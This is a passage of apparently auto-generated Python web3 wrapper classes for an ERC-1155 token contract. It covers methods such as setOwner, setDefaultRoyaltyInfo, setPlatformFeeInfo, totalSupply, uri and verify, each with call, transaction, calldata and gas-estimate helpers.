        """Execute underlying contract method via eth_sendTransaction.

        :param operator: the operator address.
        :param approved: the approval flag.
        :param tx_params: transaction parameters
        """
        (operator, approved) = self.validate_and_normalize_inputs(
            operator, approved
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(operator, approved).transact(
            tx_params.as_dict()
        )

    def build_transaction(
        self,
        operator: str,
        approved: bool,
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (operator, approved) = self.validate_and_normalize_inputs(
            operator, approved
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(operator, approved).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self,
        operator: str,
        approved: bool,
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        (operator, approved) = self.validate_and_normalize_inputs(
            operator, approved
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(operator, approved).estimateGas(
            tx_params.as_dict()
        )
class SetContractUriMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the setContractURI method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Optional[Validator] = None,
    ):
        """Persist instance data.

        :param web3_or_provider: web3 instance or raw provider.
        :param contract_address: address of the contract exposing the method.
        :param contract_function: the low-level contract function to wrap.
        :param validator: optional validator for method arguments.
        """
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, uri: str):
        """Validate the inputs to the setContractURI method.

        :param uri: the new contract URI.
        :returns: the validated ``uri``.
        """
        self.validator.assert_valid(
            method_name="setContractURI",
            parameter_name="_uri",
            argument_value=uri,
        )
        return uri

    def call(self, uri: str, tx_params: Optional[TxParams] = None) -> None:
        """Execute underlying contract method via eth_call.

        This only simulates the method; nothing is returned.

        :param uri: the new contract URI.
        :param tx_params: transaction parameters
        """
        # note: plain assignment — validate_and_normalize_inputs returns a
        # single value here, not a tuple
        uri = self.validate_and_normalize_inputs(uri)
        tx_params = super().normalize_tx_params(tx_params)
        self._underlying_method(uri).call(tx_params.as_dict())

    def send_transaction(
        self, uri: str, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param uri: the new contract URI.
        :param tx_params: transaction parameters
        """
        uri = self.validate_and_normalize_inputs(uri)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(uri).transact(tx_params.as_dict())

    def build_transaction(
        self, uri: str, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        uri = self.validate_and_normalize_inputs(uri)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(uri).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self, uri: str, tx_params: Optional[TxParams] = None
    ) -> int:
        """Estimate gas consumption of method call."""
        uri = self.validate_and_normalize_inputs(uri)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(uri).estimateGas(tx_params.as_dict())
class SetDefaultRoyaltyInfoMethod(
    ContractMethod
):  # pylint: disable=invalid-name
    """Various interfaces to the setDefaultRoyaltyInfo method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Optional[Validator] = None,
    ):
        """Persist instance data.

        :param web3_or_provider: web3 instance or raw provider.
        :param contract_address: address of the contract exposing the method.
        :param contract_function: the low-level contract function to wrap.
        :param validator: optional validator for method arguments.
        """
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self, royalty_recipient: str, royalty_bps: int
    ):
        """Validate the inputs to the setDefaultRoyaltyInfo method.

        :param royalty_recipient: the recipient address, checksummed before
            use.
        :param royalty_bps: the royalty basis points; coerced to ``int``.
        :returns: the validated ``(royalty_recipient, royalty_bps)`` pair.
        """
        self.validator.assert_valid(
            method_name="setDefaultRoyaltyInfo",
            parameter_name="_royaltyRecipient",
            argument_value=royalty_recipient,
        )
        royalty_recipient = self.validate_and_checksum_address(
            royalty_recipient
        )
        self.validator.assert_valid(
            method_name="setDefaultRoyaltyInfo",
            parameter_name="_royaltyBps",
            argument_value=royalty_bps,
        )
        # safeguard against fractional inputs
        royalty_bps = int(royalty_bps)
        return (royalty_recipient, royalty_bps)

    def call(
        self,
        royalty_recipient: str,
        royalty_bps: int,
        tx_params: Optional[TxParams] = None,
    ) -> None:
        """Execute underlying contract method via eth_call.

        This only simulates the method; nothing is returned.

        :param royalty_recipient: the recipient address.
        :param royalty_bps: the royalty basis points.
        :param tx_params: transaction parameters
        """
        (royalty_recipient, royalty_bps) = self.validate_and_normalize_inputs(
            royalty_recipient, royalty_bps
        )
        tx_params = super().normalize_tx_params(tx_params)
        self._underlying_method(royalty_recipient, royalty_bps).call(
            tx_params.as_dict()
        )

    def send_transaction(
        self,
        royalty_recipient: str,
        royalty_bps: int,
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param royalty_recipient: the recipient address.
        :param royalty_bps: the royalty basis points.
        :param tx_params: transaction parameters
        """
        (royalty_recipient, royalty_bps) = self.validate_and_normalize_inputs(
            royalty_recipient, royalty_bps
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(
            royalty_recipient, royalty_bps
        ).transact(tx_params.as_dict())

    def build_transaction(
        self,
        royalty_recipient: str,
        royalty_bps: int,
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (royalty_recipient, royalty_bps) = self.validate_and_normalize_inputs(
            royalty_recipient, royalty_bps
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(
            royalty_recipient, royalty_bps
        ).buildTransaction(tx_params.as_dict())

    def estimate_gas(
        self,
        royalty_recipient: str,
        royalty_bps: int,
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        (royalty_recipient, royalty_bps) = self.validate_and_normalize_inputs(
            royalty_recipient, royalty_bps
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(
            royalty_recipient, royalty_bps
        ).estimateGas(tx_params.as_dict())
class SetOwnerMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the setOwner method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Optional[Validator] = None,
    ):
        """Persist instance data.

        :param web3_or_provider: web3 instance or raw provider.
        :param contract_address: address of the contract exposing the method.
        :param contract_function: the low-level contract function to wrap.
        :param validator: optional validator for method arguments.
        """
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, new_owner: str):
        """Validate the inputs to the setOwner method.

        :param new_owner: the new owner address, checksummed before use.
        :returns: the validated ``new_owner``.
        """
        self.validator.assert_valid(
            method_name="setOwner",
            parameter_name="_newOwner",
            argument_value=new_owner,
        )
        new_owner = self.validate_and_checksum_address(new_owner)
        return new_owner

    def call(
        self, new_owner: str, tx_params: Optional[TxParams] = None
    ) -> None:
        """Execute underlying contract method via eth_call.

        This only simulates the method; nothing is returned.

        :param new_owner: the new owner address.
        :param tx_params: transaction parameters
        """
        # note: plain assignment — validate_and_normalize_inputs returns a
        # single value here, not a tuple
        new_owner = self.validate_and_normalize_inputs(new_owner)
        tx_params = super().normalize_tx_params(tx_params)
        self._underlying_method(new_owner).call(tx_params.as_dict())

    def send_transaction(
        self, new_owner: str, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param new_owner: the new owner address.
        :param tx_params: transaction parameters
        """
        new_owner = self.validate_and_normalize_inputs(new_owner)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(new_owner).transact(tx_params.as_dict())

    def build_transaction(
        self, new_owner: str, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        new_owner = self.validate_and_normalize_inputs(new_owner)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(new_owner).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self, new_owner: str, tx_params: Optional[TxParams] = None
    ) -> int:
        """Estimate gas consumption of method call."""
        new_owner = self.validate_and_normalize_inputs(new_owner)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(new_owner).estimateGas(
            tx_params.as_dict()
        )
class SetPlatformFeeInfoMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the setPlatformFeeInfo method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Optional[Validator] = None,
    ):
        """Persist instance data.

        :param web3_or_provider: web3 instance or raw provider.
        :param contract_address: address of the contract exposing the method.
        :param contract_function: the low-level contract function to wrap.
        :param validator: optional validator for method arguments.
        """
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self, platform_fee_recipient: str, platform_fee_bps: int
    ):
        """Validate the inputs to the setPlatformFeeInfo method.

        :param platform_fee_recipient: the recipient address, checksummed
            before use.
        :param platform_fee_bps: the fee basis points; coerced to ``int``.
        :returns: the validated ``(platform_fee_recipient,
            platform_fee_bps)`` pair.
        """
        self.validator.assert_valid(
            method_name="setPlatformFeeInfo",
            parameter_name="_platformFeeRecipient",
            argument_value=platform_fee_recipient,
        )
        platform_fee_recipient = self.validate_and_checksum_address(
            platform_fee_recipient
        )
        self.validator.assert_valid(
            method_name="setPlatformFeeInfo",
            parameter_name="_platformFeeBps",
            argument_value=platform_fee_bps,
        )
        # safeguard against fractional inputs
        platform_fee_bps = int(platform_fee_bps)
        return (platform_fee_recipient, platform_fee_bps)

    def call(
        self,
        platform_fee_recipient: str,
        platform_fee_bps: int,
        tx_params: Optional[TxParams] = None,
    ) -> None:
        """Execute underlying contract method via eth_call.

        This only simulates the method; nothing is returned.

        :param platform_fee_recipient: the recipient address.
        :param platform_fee_bps: the fee basis points.
        :param tx_params: transaction parameters
        """
        (
            platform_fee_recipient,
            platform_fee_bps,
        ) = self.validate_and_normalize_inputs(
            platform_fee_recipient, platform_fee_bps
        )
        tx_params = super().normalize_tx_params(tx_params)
        self._underlying_method(platform_fee_recipient, platform_fee_bps).call(
            tx_params.as_dict()
        )

    def send_transaction(
        self,
        platform_fee_recipient: str,
        platform_fee_bps: int,
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param platform_fee_recipient: the recipient address.
        :param platform_fee_bps: the fee basis points.
        :param tx_params: transaction parameters
        """
        (
            platform_fee_recipient,
            platform_fee_bps,
        ) = self.validate_and_normalize_inputs(
            platform_fee_recipient, platform_fee_bps
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(
            platform_fee_recipient, platform_fee_bps
        ).transact(tx_params.as_dict())

    def build_transaction(
        self,
        platform_fee_recipient: str,
        platform_fee_bps: int,
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (
            platform_fee_recipient,
            platform_fee_bps,
        ) = self.validate_and_normalize_inputs(
            platform_fee_recipient, platform_fee_bps
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(
            platform_fee_recipient, platform_fee_bps
        ).buildTransaction(tx_params.as_dict())

    def estimate_gas(
        self,
        platform_fee_recipient: str,
        platform_fee_bps: int,
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        (
            platform_fee_recipient,
            platform_fee_bps,
        ) = self.validate_and_normalize_inputs(
            platform_fee_recipient, platform_fee_bps
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(
            platform_fee_recipient, platform_fee_bps
        ).estimateGas(tx_params.as_dict())
class SetPrimarySaleRecipientMethod(
    ContractMethod
):  # pylint: disable=invalid-name
    """Various interfaces to the setPrimarySaleRecipient method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Optional[Validator] = None,
    ):
        """Persist instance data.

        :param web3_or_provider: web3 instance or raw provider.
        :param contract_address: address of the contract exposing the method.
        :param contract_function: the low-level contract function to wrap.
        :param validator: optional validator for method arguments.
        """
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, sale_recipient: str):
        """Validate the inputs to the setPrimarySaleRecipient method.

        :param sale_recipient: the recipient address, checksummed before use.
        :returns: the validated ``sale_recipient``.
        """
        self.validator.assert_valid(
            method_name="setPrimarySaleRecipient",
            parameter_name="_saleRecipient",
            argument_value=sale_recipient,
        )
        sale_recipient = self.validate_and_checksum_address(sale_recipient)
        return sale_recipient

    def call(
        self, sale_recipient: str, tx_params: Optional[TxParams] = None
    ) -> None:
        """Execute underlying contract method via eth_call.

        This only simulates the method; nothing is returned.

        :param sale_recipient: the recipient address.
        :param tx_params: transaction parameters
        """
        # note: plain assignment — validate_and_normalize_inputs returns a
        # single value here, not a tuple
        sale_recipient = self.validate_and_normalize_inputs(sale_recipient)
        tx_params = super().normalize_tx_params(tx_params)
        self._underlying_method(sale_recipient).call(tx_params.as_dict())

    def send_transaction(
        self, sale_recipient: str, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param sale_recipient: the recipient address.
        :param tx_params: transaction parameters
        """
        sale_recipient = self.validate_and_normalize_inputs(sale_recipient)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(sale_recipient).transact(
            tx_params.as_dict()
        )

    def build_transaction(
        self, sale_recipient: str, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        sale_recipient = self.validate_and_normalize_inputs(sale_recipient)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(sale_recipient).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self, sale_recipient: str, tx_params: Optional[TxParams] = None
    ) -> int:
        """Estimate gas consumption of method call."""
        sale_recipient = self.validate_and_normalize_inputs(sale_recipient)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(sale_recipient).estimateGas(
            tx_params.as_dict()
        )
class SetRoyaltyInfoForTokenMethod(
    ContractMethod
):  # pylint: disable=invalid-name
    """Various interfaces to the setRoyaltyInfoForToken method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Optional[Validator] = None,
    ):
        """Persist instance data.

        :param web3_or_provider: web3 instance or provider backing RPC calls
        :param contract_address: address of the deployed contract
        :param contract_function: bound web3 ``ContractFunction`` to wrap
        :param validator: input validator; ``Optional`` per PEP 484 since
            the default is ``None``
        """
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self, token_id: int, recipient: str, bps: int
    ) -> Tuple[int, str, int]:
        """Validate the inputs to the setRoyaltyInfoForToken method.

        :param token_id: id of the token whose royalty info is being set
        :param recipient: royalty recipient address
        :param bps: royalty amount in basis points
        :returns: the normalized ``(token_id, recipient, bps)`` triple
        """
        self.validator.assert_valid(
            method_name="setRoyaltyInfoForToken",
            parameter_name="_tokenId",
            argument_value=token_id,
        )
        # safeguard against fractional inputs
        token_id = int(token_id)
        self.validator.assert_valid(
            method_name="setRoyaltyInfoForToken",
            parameter_name="_recipient",
            argument_value=recipient,
        )
        recipient = self.validate_and_checksum_address(recipient)
        self.validator.assert_valid(
            method_name="setRoyaltyInfoForToken",
            parameter_name="_bps",
            argument_value=bps,
        )
        # safeguard against fractional inputs
        bps = int(bps)
        return (token_id, recipient, bps)

    def call(
        self,
        token_id: int,
        recipient: str,
        bps: int,
        tx_params: Optional[TxParams] = None,
    ) -> None:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        (token_id, recipient, bps) = self.validate_and_normalize_inputs(
            token_id, recipient, bps
        )
        tx_params = super().normalize_tx_params(tx_params)
        self._underlying_method(token_id, recipient, bps).call(
            tx_params.as_dict()
        )

    def send_transaction(
        self,
        token_id: int,
        recipient: str,
        bps: int,
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        (token_id, recipient, bps) = self.validate_and_normalize_inputs(
            token_id, recipient, bps
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(token_id, recipient, bps).transact(
            tx_params.as_dict()
        )

    def build_transaction(
        self,
        token_id: int,
        recipient: str,
        bps: int,
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method.

        :param tx_params: transaction parameters
        """
        (token_id, recipient, bps) = self.validate_and_normalize_inputs(
            token_id, recipient, bps
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(
            token_id, recipient, bps
        ).buildTransaction(tx_params.as_dict())

    def estimate_gas(
        self,
        token_id: int,
        recipient: str,
        bps: int,
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call.

        :param tx_params: transaction parameters
        """
        (token_id, recipient, bps) = self.validate_and_normalize_inputs(
            token_id, recipient, bps
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(token_id, recipient, bps).estimateGas(
            tx_params.as_dict()
        )
class SupportsInterfaceMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the supportsInterface method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Optional[Validator] = None,
    ):
        """Persist instance data.

        :param web3_or_provider: web3 instance or provider backing RPC calls
        :param contract_address: address of the deployed contract
        :param contract_function: bound web3 ``ContractFunction`` to wrap
        :param validator: input validator; ``Optional`` per PEP 484 since
            the default is ``None``
        """
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self, interface_id: Union[bytes, str]
    ) -> Union[bytes, str]:
        """Validate the inputs to the supportsInterface method.

        :param interface_id: 4-byte interface identifier to check
        :returns: the validated interface id, unchanged
        """
        self.validator.assert_valid(
            method_name="supportsInterface",
            parameter_name="interfaceId",
            argument_value=interface_id,
        )
        return interface_id

    def call(
        self,
        interface_id: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> bool:
        """Execute underlying contract method via eth_call.

        :param interface_id: 4-byte interface identifier to check
        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        interface_id = self.validate_and_normalize_inputs(interface_id)
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method(interface_id).call(
            tx_params.as_dict()
        )
        return bool(returned)

    def send_transaction(
        self,
        interface_id: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param interface_id: 4-byte interface identifier to check
        :param tx_params: transaction parameters
        """
        interface_id = self.validate_and_normalize_inputs(interface_id)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(interface_id).transact(
            tx_params.as_dict()
        )

    def build_transaction(
        self,
        interface_id: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method.

        :param interface_id: 4-byte interface identifier to check
        :param tx_params: transaction parameters
        """
        interface_id = self.validate_and_normalize_inputs(interface_id)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(interface_id).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self,
        interface_id: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call.

        :param interface_id: 4-byte interface identifier to check
        :param tx_params: transaction parameters
        """
        interface_id = self.validate_and_normalize_inputs(interface_id)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(interface_id).estimateGas(
            tx_params.as_dict()
        )
class SymbolMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the symbol method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> str:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        tx_dict = super().normalize_tx_params(tx_params).as_dict()
        return str(self._underlying_method().call(tx_dict))

    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        tx_dict = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().transact(tx_dict)

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        tx_dict = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().buildTransaction(tx_dict)

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        tx_dict = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().estimateGas(tx_dict)
class ThirdwebFeeMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the thirdwebFee method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> str:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        tx_dict = super().normalize_tx_params(tx_params).as_dict()
        return str(self._underlying_method().call(tx_dict))

    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        tx_dict = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().transact(tx_dict)

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        tx_dict = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().buildTransaction(tx_dict)

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        tx_dict = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().estimateGas(tx_dict)
class TotalSupplyMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the totalSupply method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Optional[Validator] = None,
    ):
        """Persist instance data.

        :param web3_or_provider: web3 instance or provider backing RPC calls
        :param contract_address: address of the deployed contract
        :param contract_function: bound web3 ``ContractFunction`` to wrap
        :param validator: input validator; ``Optional`` per PEP 484 since
            the default is ``None``
        """
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, index_0: int) -> int:
        """Validate the inputs to the totalSupply method.

        :param index_0: token id to query the supply of
        :returns: the input coerced to ``int``
        """
        self.validator.assert_valid(
            method_name="totalSupply",
            parameter_name="index_0",
            argument_value=index_0,
        )
        # safeguard against fractional inputs
        return int(index_0)

    def call(self, index_0: int, tx_params: Optional[TxParams] = None) -> int:
        """Execute underlying contract method via eth_call.

        :param index_0: token id to query the supply of
        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        index_0 = self.validate_and_normalize_inputs(index_0)
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method(index_0).call(tx_params.as_dict())
        return int(returned)

    def send_transaction(
        self, index_0: int, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param index_0: token id to query the supply of
        :param tx_params: transaction parameters
        """
        index_0 = self.validate_and_normalize_inputs(index_0)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(index_0).transact(tx_params.as_dict())

    def build_transaction(
        self, index_0: int, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Construct calldata to be used as input to the method.

        :param index_0: token id to query the supply of
        :param tx_params: transaction parameters
        """
        index_0 = self.validate_and_normalize_inputs(index_0)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(index_0).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self, index_0: int, tx_params: Optional[TxParams] = None
    ) -> int:
        """Estimate gas consumption of method call.

        :param index_0: token id to query the supply of
        :param tx_params: transaction parameters
        """
        index_0 = self.validate_and_normalize_inputs(index_0)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(index_0).estimateGas(
            tx_params.as_dict()
        )
class UriMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the uri method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Optional[Validator] = None,
    ):
        """Persist instance data.

        :param web3_or_provider: web3 instance or provider backing RPC calls
        :param contract_address: address of the deployed contract
        :param contract_function: bound web3 ``ContractFunction`` to wrap
        :param validator: input validator; ``Optional`` per PEP 484 since
            the default is ``None``
        """
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, token_id: int) -> int:
        """Validate the inputs to the uri method.

        :param token_id: token id whose metadata URI is requested
        :returns: the input coerced to ``int``
        """
        self.validator.assert_valid(
            method_name="uri",
            parameter_name="_tokenId",
            argument_value=token_id,
        )
        # safeguard against fractional inputs
        return int(token_id)

    def call(self, token_id: int, tx_params: Optional[TxParams] = None) -> str:
        """Execute underlying contract method via eth_call.

        :param token_id: token id whose metadata URI is requested
        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        token_id = self.validate_and_normalize_inputs(token_id)
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method(token_id).call(tx_params.as_dict())
        return str(returned)

    def send_transaction(
        self, token_id: int, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param token_id: token id whose metadata URI is requested
        :param tx_params: transaction parameters
        """
        token_id = self.validate_and_normalize_inputs(token_id)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(token_id).transact(tx_params.as_dict())

    def build_transaction(
        self, token_id: int, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Construct calldata to be used as input to the method.

        :param token_id: token id whose metadata URI is requested
        :param tx_params: transaction parameters
        """
        token_id = self.validate_and_normalize_inputs(token_id)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(token_id).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self, token_id: int, tx_params: Optional[TxParams] = None
    ) -> int:
        """Estimate gas consumption of method call.

        :param token_id: token id whose metadata URI is requested
        :param tx_params: transaction parameters
        """
        token_id = self.validate_and_normalize_inputs(token_id)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(token_id).estimateGas(
            tx_params.as_dict()
        )
class VerifyMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the verify method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Optional[Validator] = None,
    ):
        """Persist instance data.

        :param web3_or_provider: web3 instance or provider backing RPC calls
        :param contract_address: address of the deployed contract
        :param contract_function: bound web3 ``ContractFunction`` to wrap
        :param validator: input validator; ``Optional`` per PEP 484 since
            the default is ``None``
        """
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self, req: ITokenERC1155MintRequest, signature: Union[bytes, str]
    ) -> Tuple[ITokenERC1155MintRequest, Union[bytes, str]]:
        """Validate the inputs to the verify method.

        :param req: mint request struct to verify
        :param signature: signature over the mint request
        :returns: the validated ``(req, signature)`` pair, unchanged
        """
        self.validator.assert_valid(
            method_name="verify",
            parameter_name="_req",
            argument_value=req,
        )
        self.validator.assert_valid(
            method_name="verify",
            parameter_name="_signature",
            argument_value=signature,
        )
        return (req, signature)

    def call(
        self,
        req: ITokenERC1155MintRequest,
        signature: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> Tuple[bool, str]:
        """Execute underlying contract method via eth_call.

        :param req: mint request struct to verify
        :param signature: signature over the mint request
        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        (req, signature) = self.validate_and_normalize_inputs(req, signature)
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method(req, signature).call(
            tx_params.as_dict()
        )
        # The contract returns (success flag, recovered signer address).
        return (
            returned[0],
            returned[1],
        )

    def send_transaction(
        self,
        req: ITokenERC1155MintRequest,
        signature: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param req: mint request struct to verify
        :param signature: signature over the mint request
        :param tx_params: transaction parameters
        """
        (req, signature) = self.validate_and_normalize_inputs(req, signature)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(req, signature).transact(
            tx_params.as_dict()
        )

    def build_transaction(
        self,
        req: ITokenERC1155MintRequest,
        signature: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method.

